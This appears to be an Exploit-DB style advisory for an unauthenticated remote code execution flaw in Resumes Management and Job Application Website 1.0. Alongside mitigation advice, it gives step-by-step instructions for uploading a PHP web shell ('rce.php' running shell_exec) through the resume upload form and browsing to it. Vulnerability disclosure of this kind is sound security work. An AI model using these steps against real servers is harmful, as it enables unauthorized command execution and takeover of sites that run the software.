vendor: Resumes Management and Job Application Website
by: Arnav Tripathy
CVSS: 7.5 HIGH
Remote Code Execution
CWE: 78
Product Name: Resumes Management and Job Application Website
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Platforms Tested: Linux with LAMP stack
2021

Resumes Management and Job Application Website 1.0 – RCE (Unauthenticated)

The Resumes Management and Job Application Website 1.0 allows unauthenticated users to upload resume files. By uploading a PHP file with malicious code, an attacker can execute arbitrary commands on the server and gain unauthorized access. The provided exploit code uploads a PHP file named 'rce.php' containing a command to retrieve the current user's information using the 'whoami' command. When accessing the uploaded file through the URL, the output of the 'whoami' command is displayed.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and file type checking when accepting file uploads. Additionally, the web server should be configured to prevent the execution of uploaded PHP files.

Exploit-DB raw data:

# Exploit Title: Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)
# Date: 3/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp

Submit rce.php in resume file upload unauthenticated.
Contents of rce.php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>

Navigate to http://localhost/Resumes Management and Job Application Website/files/rce.php

You will get the output of whoami